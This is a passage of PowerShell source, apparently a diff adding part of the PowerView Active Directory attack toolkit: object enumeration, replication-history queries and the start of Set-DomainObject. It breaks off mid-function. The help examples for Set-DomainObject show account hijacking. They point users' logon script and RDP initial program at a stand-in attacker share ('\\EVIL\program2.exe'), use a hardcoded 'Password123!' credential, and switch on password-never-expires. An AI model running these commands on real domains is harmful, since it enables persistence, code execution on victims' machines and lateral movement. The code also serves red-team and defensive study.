(&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +.OUTPUTS + +PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObject')] + [OutputType('PowerView.ADObject.Raw')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + if ($ObjectSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^(CN|OU|DC)=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + Write-Verbose "[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + if (-not $ObjectSearcher) { + Write-Warning "[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $ObjectName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$ObjectName)" + $SearcherArguments['Domain'] = $ObjectDomain + Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'" + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + if ($Filter -and $Filter -ne '') { + $ObjectSearcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() } + else { $Results = $ObjectSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Object = $_ + $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw') + } + else { + $Object = Convert-LDAPProperty -Properties $_.Properties + $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject') + } + $Object + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_" + } + } + $ObjectSearcher.dispose() + } + } +} + + +function Get-DomainObjectAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory attribute replication metadata for the specified +object, i.e. a parsed version of the msds-replattributemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'. +This is the domain attribute replication metadata associated with the object. The results are +parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectAttributeHistory -Domain testlab.local + +Return all attribute replication metadata for all objects in the testlab.local domain. + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft + +ObjectDN ObjectGuid AttributeNam LastOriginat Version LastOriginat + e ingChange ingDsaDN +-------- ---------- ------------ ------------ ------- ------------ +CN=dfm.a,C... a6263874-f... objectClass 2017-03-0... 1 CN=NTDS S... +CN=DA,CN=U... 77b56df4-f... objectClass 2017-04-1... 1 CN=NTDS S... +CN=harmj0y... 94299db1-e... objectClass 2017-03-0... 1 CN=NTDS S... + +.EXAMPLE + +Get-DomainObjectAttributeHistory harmj0y -Properties userAccountControl + +ObjectDN : CN=harmj0y,CN=Users,DC=testlab,DC=local +ObjectGuid : 94299db1-e3e7-48f9-845b-3bffef8bedbb +AttributeName : userAccountControl +LastOriginatingChange : 2017-03-07T19:56:27Z +Version : 4 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replattributemetadata','distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory') + $Output + } + } + else { + Write-Verbose "[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Get-DomainObjectLinkedAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory links attribute value replication metadata for the +specified object, i.e. a parsed version of the msds-replvaluemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'. +This is the domain linked attribute value replication metadata associated with the object. The +results are parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a + +Count Name +----- ---- + 4 CN=Administrators,CN=Builtin,DC=testlab,DC=local + 4 CN=Users,CN=Builtin,DC=testlab,DC=local + 2 CN=Guests,CN=Builtin,DC=testlab,DC=local + 1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local + 1 CN=Schema Admins,CN=Users,DC=testlab,DC=local + 1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local + 4 CN=Domain Admins,CN=Users,DC=testlab,DC=local + 1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local + 1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local + 1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local + 8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local + 2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,... + 1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con... + 1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local + 3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local + + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory + +ObjectDN : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : 94e782c1-16a1-400b-a7d0-1126038c6387 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=dfm,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-06-13T22:20:02Z +TimeCreated : 2017-06-13T22:20:02Z +LastOriginatingChange : 2017-06-13T22:20:22Z +Version : 2 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local + +ObjectDN : CN=ServerAdmins,CN=Users,DC=testlab,DC=local +ObjectGuid : 603b46ad-555c-49b3-8745-c0718febefc2 +AttributeName : member +AttributeValue : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local +TimeDeleted : 2017-04-10T22:17:19Z +TimeCreated : 2017-04-10T22:17:19Z +LastOriginatingChange : 2017-04-10T22:17:19Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectLinkedAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectLinkedAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replvaluemetadata','distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn + $Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated + $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory') + $Output + } + } + else { + Write-Verbose "[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Set-DomainObject { +<# +.SYNOPSIS + +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Set + +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +.PARAMETER XOR + +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +.PARAMETER Clear + +Specifies an array of object properties that will be cleared in the directory. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose + +Cleares the 'department' field for both object identities. + +.EXAMPLE + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\EVIL\program2.exe +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [Alias('Replace')] + [Hashtable] + $Set, + + [ValidateNotNullOrEmpty()] + [Hashtable] + $XOR, + + [ValidateNotNullOrEmpty()] + [String[]] + $Clear, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{'Raw' = $True} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if 